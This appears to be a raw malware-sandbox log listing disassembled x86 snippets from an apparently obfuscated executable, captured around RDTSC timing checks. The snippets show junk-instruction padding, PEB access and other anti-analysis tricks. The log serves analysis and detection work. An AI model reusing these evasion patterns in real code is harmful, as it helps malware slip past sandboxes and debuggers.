Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1652BBA second address: 1652C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add edx, 15A57F00h 0x00000012 push dword ptr [ebp+12462413h] 0x00000018 call 00007F04A523FCC5h 0x0000001d pop edx 0x0000001e call 00007F04A523FCB9h 0x00000023 pushad 0x00000024 jmp 00007F04A523FCBBh 0x00000029 jnc 00007F04A523FCBCh 0x0000002f jp 00007F04A523FCB6h 0x00000035 popad 0x00000036 push eax 0x00000037 jmp 00007F04A523FCBBh 0x0000003c mov eax, dword ptr [esp+04h] 0x00000040 jnl 00007F04A523FCD7h 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b push edi 0x0000004c pop edi 0x0000004d pop ecx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1652C56 second address: 1652C6A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04A523AA88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1653FC4 second address: 1653FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950069 second address: 7950081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950081 second address: 79500BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F04A523FCC6h 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F04A523FCBAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79500BE second address: 79500C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79500C2 second address: 79500C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79500C8 second address: 79500CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79500CD second address: 795010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, D329h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f mov eax, 272ABE61h 0x00000014 mov esi, 48F3DF9Dh 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c jmp 00007F04A523FCC5h 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F04A523FCBCh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795010E second address: 7950114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950114 second address: 7950118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950118 second address: 795014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F04A523AA99h 0x0000000e mov ebx, dword ptr [eax+10h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F04A523AA8Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795014C second address: 7950171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04A523FCBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950171 second address: 7950181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950181 second address: 795022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e mov esi, 71A16CC1h 0x00000013 pop eax 0x00000014 push edi 0x00000015 pushfd 0x00000016 jmp 00007F04A523FCBAh 0x0000001b and eax, 085EDCD8h 0x00000021 jmp 00007F04A523FCBBh 0x00000026 popfd 0x00000027 pop eax 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F04A523FCC5h 0x00000031 or ecx, 43D95C76h 0x00000037 jmp 00007F04A523FCC1h 0x0000003c popfd 0x0000003d mov ecx, 3C5CF767h 0x00000042 popad 0x00000043 mov esi, dword ptr [775606ECh] 0x00000049 jmp 00007F04A523FCBAh 0x0000004e test esi, esi 0x00000050 jmp 00007F04A523FCC0h 0x00000055 jne 00007F04A5240927h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e call 00007F04A523FCBDh 0x00000063 pop ecx 0x00000064 push edx 0x00000065 pop ecx 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795022D second address: 7950274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b jmp 00007F04A523AA8Eh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 mov dx, cx 0x00000019 mov ecx, 671DF9A5h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F04A523AA97h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950274 second address: 795029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [77530B60h] 0x0000000f mov eax, 756AE5E0h 0x00000014 ret 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795029C second address: 79502D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a push 00000044h 0x0000000c jmp 00007F04A523AA8Eh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop ecx 0x00000017 call 00007F04A523AA99h 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79502D7 second address: 795030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F04A523FCC0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F04A523FCBEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795030B second address: 7950311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950311 second address: 795035D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F04A523FCBFh 0x00000010 sub ax, ECAEh 0x00000015 jmp 00007F04A523FCC9h 0x0000001a popfd 0x0000001b mov ecx, 47A86D37h 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 mov ebx, 32C47628h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795042D second address: 7950483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F04A523AA8Fh 0x00000009 add si, 72FEh 0x0000000e jmp 00007F04A523AA99h 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F04A523AA99h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950483 second address: 79504F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d mov eax, 189C68B3h 0x00000012 mov ecx, 6EEADD0Fh 0x00000017 popad 0x00000018 mov eax, dword ptr [ebx+4Ch] 0x0000001b jmp 00007F04A523FCC2h 0x00000020 mov dword ptr [esi+10h], eax 0x00000023 pushad 0x00000024 mov di, cx 0x00000027 call 00007F04A523FCBAh 0x0000002c movzx eax, bx 0x0000002f pop edx 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+50h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F04A523FCC9h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79504F0 second address: 7950517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523AA8Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950517 second address: 7950563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e pushad 0x0000000f jmp 00007F04A523FCC1h 0x00000014 pushfd 0x00000015 jmp 00007F04A523FCC0h 0x0000001a sbb si, E038h 0x0000001f jmp 00007F04A523FCBBh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi+18h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov dx, cx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950563 second address: 79505C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F04A523AA92h 0x0000000f and al, FFFFFFC8h 0x00000012 jmp 00007F04A523AA8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+58h] 0x0000001c jmp 00007F04A523AA96h 0x00000021 mov dword ptr [esi+1Ch], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ebx, 70E24840h 0x0000002c mov edx, 48C3A86Ch 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79505C2 second address: 79505D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79505D7 second address: 7950662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b jmp 00007F04A523AA8Dh 0x00000010 mov dword ptr [esi+20h], eax 0x00000013 jmp 00007F04A523AA8Eh 0x00000018 mov eax, dword ptr [ebx+60h] 0x0000001b jmp 00007F04A523AA90h 0x00000020 mov dword ptr [esi+24h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F04A523AA8Dh 0x0000002c sub si, FF06h 0x00000031 jmp 00007F04A523AA91h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007F04A523AA90h 0x0000003d or ecx, 507905A8h 0x00000043 jmp 00007F04A523AA8Bh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950662 second address: 79506BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007F04A523FCBEh 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 jmp 00007F04A523FCC0h 0x00000019 mov eax, dword ptr [ebx+68h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F04A523FCC7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79506BF second address: 79506C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79506C5 second address: 79506C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79506C9 second address: 79506CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79506CD second address: 7950739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F04A523FCBDh 0x00000012 adc cl, 00000036h 0x00000015 jmp 00007F04A523FCC1h 0x0000001a popfd 0x0000001b mov ah, 9Fh 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+6Ch] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F04A523FCC9h 0x00000029 xor cx, A746h 0x0000002e jmp 00007F04A523FCC1h 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 push esi 0x00000037 pop edi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950739 second address: 79507D0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007F04A523AA95h 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 pushad 0x00000019 mov edx, ecx 0x0000001b pushad 0x0000001c mov edi, eax 0x0000001e mov bl, al 0x00000020 popad 0x00000021 popad 0x00000022 mov word ptr [esi+32h], ax 0x00000026 pushad 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F04A523AA96h 0x0000002e jmp 00007F04A523AA95h 0x00000033 popfd 0x00000034 pop eax 0x00000035 movsx ebx, si 0x00000038 popad 0x00000039 mov eax, dword ptr [ebx+0000008Ch] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F04A523AA95h 0x00000048 jmp 00007F04A523AA8Bh 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79507D0 second address: 79507D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79507D5 second address: 7950812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007F04A523AA96h 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F04A523AA8Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950812 second address: 7950821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950821 second address: 7950891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0F2E751Ah 0x00000008 push edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+38h], eax 0x00000010 pushad 0x00000011 jmp 00007F04A523AA93h 0x00000016 mov dx, si 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+1Ch] 0x0000001d jmp 00007F04A523AA92h 0x00000022 mov dword ptr [esi+3Ch], eax 0x00000025 jmp 00007F04A523AA90h 0x0000002a mov eax, dword ptr [ebx+20h] 0x0000002d jmp 00007F04A523AA90h 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov esi, ebx 0x0000003a mov di, F35Ch 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950891 second address: 79508B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov si, 5153h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79508B4 second address: 79508B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79508B8 second address: 79508C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov al, 97h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79508C3 second address: 7950996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 00000001h 0x00000008 jmp 00007F04A523AA8Dh 0x0000000d nop 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 mov esi, 619DB18Fh 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 mov ebx, 1EEE37C6h 0x0000001e pushfd 0x0000001f jmp 00007F04A523AA97h 0x00000024 adc ah, 0000004Eh 0x00000027 jmp 00007F04A523AA99h 0x0000002c popfd 0x0000002d popad 0x0000002e nop 0x0000002f pushad 0x00000030 call 00007F04A523AA8Ch 0x00000035 pushfd 0x00000036 jmp 00007F04A523AA92h 0x0000003b and ecx, 6EE5BDF8h 0x00000041 jmp 00007F04A523AA8Bh 0x00000046 popfd 0x00000047 pop ecx 0x00000048 mov edi, 4FACA13Ch 0x0000004d popad 0x0000004e lea eax, dword ptr [ebp-10h] 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007F04A523AA91h 0x00000058 or ax, 8296h 0x0000005d jmp 00007F04A523AA91h 0x00000062 popfd 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov ebx, 043A1F2Ah 0x0000006d mov ebx, 3AB303F6h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950996 second address: 795099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795099C second address: 79509A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950A00 second address: 7950A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F04A523FCBFh 0x00000008 pop esi 0x00000009 mov ecx, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F04A523FCBEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950A2A second address: 7950A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bl, 4Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F0514DC9714h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA91h 0x00000018 adc cl, FFFFFFD6h 0x0000001b jmp 00007F04A523AA91h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp-0Ch] 0x00000025 jmp 00007F04A523AA8Eh 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ebx, 3F8FC710h 0x00000035 mov dx, 443Ch 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950A85 second address: 7950AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007F04A523FCC0h 0x00000011 push 00000001h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F04A523FCBEh 0x0000001a add ax, 35B8h 0x0000001f jmp 00007F04A523FCBBh 0x00000024 popfd 0x00000025 movzx eax, di 0x00000028 popad 0x00000029 push edx 0x0000002a jmp 00007F04A523FCC0h 0x0000002f mov dword ptr [esp], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov al, DBh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950AEE second address: 7950B3E instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, 503021E1h 0x0000000c popad 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 pushad 0x00000011 mov ah, 2Ch 0x00000013 pushfd 0x00000014 jmp 00007F04A523AA8Fh 0x00000019 jmp 00007F04A523AA93h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F04A523AA95h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950B3E second address: 7950B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950B44 second address: 7950B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950B48 second address: 7950B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F04A523FCC6h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F04A523FCC7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950B9D second address: 7950BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950BA1 second address: 7950BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950BA7 second address: 7950C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F04A523AA8Eh 0x00000010 test edi, edi 0x00000012 jmp 00007F04A523AA90h 0x00000017 js 00007F0514DC9561h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F04A523AA8Dh 0x00000026 jmp 00007F04A523AA8Bh 0x0000002b popfd 0x0000002c mov ebx, eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950C04 second address: 7950C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F04A523FCBBh 0x00000009 adc esi, 29536A7Eh 0x0000000f jmp 00007F04A523FCC9h 0x00000014 popfd 0x00000015 mov ecx, 3D5904C7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [ebp-04h] 0x00000020 jmp 00007F04A523FCBAh 0x00000025 mov dword ptr [esi+08h], eax 0x00000028 pushad 0x00000029 push esi 0x0000002a mov ecx, edx 0x0000002c pop edi 0x0000002d popad 0x0000002e lea eax, dword ptr [ebx+70h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov cx, 9243h 0x00000038 movzx eax, dx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950C5F second address: 7950C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7950C65 second address: 7950C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
